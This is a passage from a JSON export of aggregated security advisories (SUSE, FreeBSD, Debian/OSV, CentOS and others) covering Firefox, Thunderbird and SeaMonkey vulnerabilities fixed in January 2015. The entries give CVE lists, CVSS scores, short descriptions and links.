"NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-14T00:00:00", "id": "ASA-201501-7", "href": "https://lists.archlinux.org/pipermail/arch-security/2015-January/000203.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2021-06-08T18:39:27", "description": "MozillaFirefox was updated to version 35.0 (bnc#910669)\n\n Notable features:\n * Firefox Hello with new rooms-based conversations model\n * Implemented HTTP Public Key Pinning Extension (for enhanced\n authentication of encrypted connections)\n\n Security fixes:\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during\n bitmap rendering\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in\n Web Audio\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n\n - obsolete tracker-miner-firefox < 0.15 because it leads to startup\n crashes (bnc#908892)\n\n", "cvss3": {}, "published": "2015-01-19T14:04:43", "type": "suse", "title": "Security update for MozillaFirefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-19T14:04:43", "id": "OPENSUSE-SU-2015:0077-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00014.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:28", "description": "MozillaFirefox was updated to version 35.0 (bnc#910669)\n\n Notable features:\n * Firefox Hello with new rooms-based conversations model\n * Implemented HTTP Public Key Pinning Extension (for enhanced\n authentication of encrypted connections)\n\n Security fixes:\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use during\n bitmap rendering\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory in\n Web Audio\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n\n - obsolete tracker-miner-firefox < 0.15 because it leads to startup\n crashes (bnc#908892)\n\n", "cvss3": {}, "published": "2015-01-19T15:04:39", "type": "suse", "title": "Security update for MozillaFirefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-19T15:04:39", "id": "OPENSUSE-SU-2015:0077-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00015.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-04T11:27:55", "description": "Mozilla seamonkey was updated to SeaMonkey 2.32 (bnc#910669)\n * MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 Miscellaneous memory safety\n hazards\n * MFSA 2015-02/CVE-2014-8637 (bmo#1094536) Uninitialized memory use\n during bitmap rendering\n * MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n * MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through\n Proxy Authenticate responses\n * MFSA 2015-05/CVE-2014-8640 (bmo#1100409) Read of uninitialized memory\n in Web Audio\n * MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n * MFSA 2015-07/CVE-2014-8643 (bmo#1114170) (Windows-only) Gecko Media\n Plugin sandbox escape\n * MFSA 2015-08/CVE-2014-8642 (bmo#1079658) Delegated OCSP responder\n certificates failure with id-pkix-ocsp-nocheck extension\n * MFSA 2015-09/CVE-2014-8636 (bmo#987794) XrayWrapper bypass through DOM\n objects\n - use GStreamer 1.0 from 13.2 on\n\n", "cvss3": {}, "published": "2015-02-02T12:05:27", "type": "suse", "title": "Security update for seamonkey (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-02-02T12:05:27", "id": "OPENSUSE-SU-2015:0192-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-02/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:39", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and\n security issues.\n\n Mozilla NSS has been updated to 3.17.3, fixing a security issue and\n updating the root certificate list.\n\n For more information, please see\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>\n <<a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>>\n\n Security Issues:\n\n * CVE-2014-1569\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569</a>>\n * CVE-2014-8634\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634</a>>\n * CVE-2014-8639\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639</a>>\n * CVE-2014-8641\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641</a>>\n * CVE-2014-8638\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638</a>>\n * CVE-2014-8636\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636</a>>\n * CVE-2014-8637\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637</a>>\n * CVE-2014-8640\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640</a>>\n\n\n", "cvss3": {}, "published": "2015-01-29T07:04:56", "type": "suse", "title": "Security update for Mozilla Firefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-1569", "CVE-2014-8638"], "modified": "2015-01-29T07:04:56", "id": "SUSE-SU-2015:0171-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00032.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:27", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and\n security issues.\n\n Mozilla NSS has been updated to 3.17.3, fixing a security issue and\n updating the root certificates list.\n\n For more information, please refer to\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>\n <<a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>> .\n\n Security Issues:\n\n * CVE-2014-1569\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569</a>>\n * CVE-2014-8634\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634</a>>\n * CVE-2014-8639\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639</a>>\n * CVE-2014-8641\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641</a>>\n * CVE-2014-8638\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638</a>>\n * CVE-2014-8636\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636</a>>\n * CVE-2014-8637\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637</a>>\n * CVE-2014-8640\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640</a>>\n\n", "cvss3": {}, "published": "2015-01-29T07:06:36", "type": "suse", "title": "Security update for Mozilla Firefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-1569", "CVE-2014-8638"], "modified": "2015-01-29T07:06:36", "id": "SUSE-SU-2015:0173-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00033.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:19", "description": "Mozilla Firefox has been updated to the 31.4.0ESR release, fixing bugs and\n security issues.\n\n Mozilla NSS has been updated to 3.17.3, fixing a security issue and\n updating the root certificate list.\n\n For more information, please see\n <a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>\n <<a rel=\"nofollow\" href=\"https://www.mozilla.org/en-US/security/advisories/\">https://www.mozilla.org/en-US/security/advisories/</a>>\n\n Security Issues:\n\n * CVE-2014-1569\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1569</a>>\n * CVE-2014-8634\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8634</a>>\n * CVE-2014-8639\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8639</a>>\n * CVE-2014-8641\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8641</a>>\n * CVE-2014-8638\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8638</a>>\n * CVE-2014-8636\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8636</a>>\n * CVE-2014-8637\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8637</a>>\n * CVE-2014-8640\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8640</a>>\n\n", "cvss3": {}, "published": "2015-01-31T01:09:23", "type": "suse", "title": "Security update for Mozilla Firefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-1569", "CVE-2014-8638"], "modified": "2015-01-31T01:09:23", "id": "SUSE-SU-2015:0180-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00036.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:41", "description": "This update fixes the following security issues in MozillaFirefox:\n - MFSA 2015-01/CVE-2014-8634/CVE-2014-8635 (bmo#1109889, bmo#1111737,\n bmo#1026774, bmo#1027300, bmo#1054538, bmo#1067473, bmo#1070962,\n bmo#1072130, bmo#1072871, bmo#1098583) Miscellaneous memory safety\n hazards (rv:35.0 / rv:31.4)\n - MFSA 2015-03/CVE-2014-8638 (bmo#1080987) sendBeacon requests lack an\n Origin header\n - MFSA 2015-04/CVE-2014-8639 (bmo#1095859) Cookie injection through Proxy\n Authenticate responses\n - MFSA 2015-06/CVE-2014-8641 (bmo#1108455) Read-after-free in WebRTC\n\n Also Mozilla NSS was updated to 3.17.3 to fix:\n * The QuickDER decoder now decodes lengths robustly\n (bmo#1064670/CVE-2014-1569)\n * Support for TLS_FALLBACK_SCSV has been added to the ssltap and tstclnt\n utilities\n * Changes in CA certificates\n\n", "cvss3": {}, "published": "2015-01-19T13:04:47", "type": "suse", "title": "Security update for MozillaFirefox (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-1569", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-19T13:04:47", "id": "SUSE-SU-2015:0076-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-01/msg00013.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:39:34", "description": "Combined Mozilla update:\n - Update Firefox to 31.8.0\n - Update Thunderbird to 31.8.0\n - Update mozilla-nspr to 4.10.6\n - Update mozilla-nss to 3.19.2 to fix several security issues.\n\n", "cvss3": {}, "published": "2015-07-18T19:07:56", "type": "suse", "title": "Mozilla (Firefox/Thunderbird) updates to 31.8.0 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-1577", "CVE-2015-4000", "CVE-2015-2738", "CVE-2015-0813", "CVE-2015-0831", "CVE-2015-2713", "CVE-2014-1590", "CVE-2015-2737", "CVE-2014-1586", "CVE-2014-1587", "CVE-2014-1567", "CVE-2014-1594", "CVE-2014-1576", "CVE-2015-2728", "CVE-2015-2724", "CVE-2015-2716", "CVE-2011-3079", "CVE-2014-1578", "CVE-2015-2710", "CVE-2015-0816", "CVE-2015-2739", "CVE-2015-2733", "CVE-2015-2721", "CVE-2014-1563", "CVE-2015-2722", "CVE-2014-1581", "CVE-2014-1592", "CVE-2014-1565", "CVE-2015-2734", "CVE-2014-1564", "CVE-2014-1574", "CVE-2015-0815", "CVE-2015-2743", "CVE-2014-8634", "CVE-2015-0807", "CVE-2014-1562", "CVE-2015-0836", "CVE-2014-1553", "CVE-2014-8639", "CVE-2015-2735", "CVE-2015-2708", "CVE-2015-0822", "CVE-2015-0801", "CVE-2015-0827", "CVE-2015-2736", "CVE-2014-8635", "CVE-2014-8638", "CVE-2015-2740", "CVE-2014-1585", "CVE-2014-1593", "CVE-2015-2730", "CVE-2015-0833"], "modified": "2015-07-18T19:07:56", "id": "OPENSUSE-SU-2015:1266-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-07/msg00031.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nThe Mozilla Project reports:\n\nMFSA-2015-01 Miscellaneous memory safety hazards (rv:35.0\n\t / rv:31.4)\nMFSA-2015-02 Uninitialized memory use during bitmap\n\t rendering\nMFSA-2015-03 sendBeacon requests lack an Origin header\nMFSA-2015-04 Cookie injection through Proxy Authenticate\n\t responses\nMFSA-2015-05 Read of uninitialized memory in Web Audio\nMFSA-2015-06 Read-after-free in WebRTC\nMFSA-2015-07 Gecko Media Plugin sandbox escape\nMFSA-2015-08 Delegated OCSP responder certificates failure\n\t with id-pkix-ocsp-nocheck extension\nMFSA-2015-09 XrayWrapper bypass through DOM objects\n\n\n", "cvss3": {}, "published": "2015-01-13T00:00:00", "type": "freebsd", "title": "mozilla -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8635", "CVE-2014-8636", "CVE-2014-8637", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8641", "CVE-2014-8642", "CVE-2014-8643"], "modified": "2015-01-13T00:00:00", "id": "BD62C640-9BB9-11E4-A5AD-000C297FB80F", "href": "https://vuxml.freebsd.org/freebsd/bd62c640-9bb9-11e4-a5ad-000c297fb80f.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2021-06-08T18:56:47", "description": "Memory corruptions, headers injection, restrictions bypass.", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "securityvulns", "title": "Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-8642", "CVE-2014-8637", "CVE-2014-8636", "CVE-2014-8643", "CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8640", "CVE-2014-8635", "CVE-2014-8638"], "modified": "2015-01-19T00:00:00", "id": "SECURITYVULNS:VULN:14223", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:14223", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osv": [{"lastseen": "2022-08-10T07:06:31", "description": "\nMultiple security issues have been found in Iceweasel, Debian's version\nof the Mozilla Firefox web browser: Multiple memory safety errors\nand implementation errors may lead to the execution of arbitrary code,\ninformation leaks or denial of service.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 31.4.0esr-1~deb7u1.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0esr-1.\n\n\nWe recommend that you upgrade your iceweasel packages.\n\n\n", "cvss3": {}, "published": "2015-01-14T00:00:00", "type": "osv", "title": "iceweasel - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8641", "CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2022-08-10T07:06:26", "id": "OSV:DSA-3127-1", "href": "https://osv.dev/vulnerability/DSA-3127-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-10T07:10:20", "description": "\nMultiple security issues have been found in Icedove, Debian's version of\nthe Mozilla Thunderbird mail and news client: Multiple memory safety\nerrors and implementation errors may lead to the execution of arbitrary\ncode, information leaks or denial of service.\n\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 31.4.0-1~deb7u1.\n\n\nFor the upcoming stable distribution (jessie), these problems will be\nfixed soon.\n\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 31.4.0-1.\n\n\nWe recommend that you upgrade your icedove packages.\n\n\n", "cvss3": {}, "published": "2015-01-19T00:00:00", "type": "osv", "title": "icedove - security update", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8639", "CVE-2014-8638"], "modified": "2022-08-10T07:09:17", "id": "OSV:DSA-3132-1", "href": "https://osv.dev/vulnerability/DSA-3132-1", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2023-01-01T04:43:49", "description": "**CentOS Errata and Security Advisory** CESA-2015:0046\n\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2014-8634, CVE-2014-8639, CVE-2014-8641)\n\nIt was found that the Beacon interface implementation in Firefox did not\nfollow the Cross-Origin Resource Sharing (CORS) specification. A web page\ncontaining malicious content could allow a remote attacker to conduct a\nCross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nXiaofeng Zheng, and Mitchell Harper as the original reporters of these\nissues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Firefox 31.4.0 ESR. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nThis update also fixes the following bug:\n\n* The default dictionary for Firefox's spell checker is now correctly set\nto the system's locale language. (BZ#643954, BZ#1150572)\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 31.4.0 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070348.html\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070350.html\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070351.html\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070352.html\n\n**Affected packages:**\nfirefox\nxulrunner\nxulrunner-devel\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:0046", "cvss3": {}, "published": "2015-01-14T16:08:25", "type": "centos", "title": "firefox, xulrunner security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639", "CVE-2014-8641"], "modified": "2015-01-14T18:49:19", "id": "CESA-2015:0046", "href": "https://lists.centos.org/pipermail/centos-announce/2015-January/070348.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-01T04:43:49", "description": "**CentOS Errata and Security Advisory** CESA-2015:0047\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nTwo flaws were found in the processing of malformed web content. A web page\ncontaining malicious content could cause Firefox to crash or, potentially,\nexecute arbitrary code with the privileges of the user running Firefox.\n(CVE-2014-8634, CVE-2014-8639)\n\nIt was found that the Beacon interface implementation in Thunderbird did\nnot follow the Cross-Origin Resource Sharing (CORS) specification. A web\npage containing malicious content could allow a remote attacker to conduct\na Cross-Site Request Forgery (XSRF) attack. (CVE-2014-8638)\n\nNote: All of the above issues cannot be exploited by a specially crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Christian Holler, Patrick McManus, Muneaki Nishimura,\nand Xiaofeng Zheng as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla security\nadvisories for Thunderbird 31.4.0. You can find a link to the Mozilla\nadvisories in the References section of this erratum.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 31.4.0, which corrects these issues.\nAfter installing the update, Thunderbird must be restarted for the changes\nto take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070347.html\nhttps://lists.centos.org/pipermail/centos-announce/2015-January/070353.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:0047", "cvss3": {}, "published": "2015-01-14T15:52:57", "type": "centos", "title": "thunderbird security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8634", "CVE-2014-8638", "CVE-2014-8639"], "modified": "2015-01-14T19:43:12", "id": "CESA-2015:0047", "href": "https://lists.centos.org/pipermail/centos-announce/2015-January/070347.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T22:59:15", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3127-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJanuary 14, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : iceweasel\nCVE ID : CVE-2014-8634 CVE-2014-8638 CVE-2014-8639 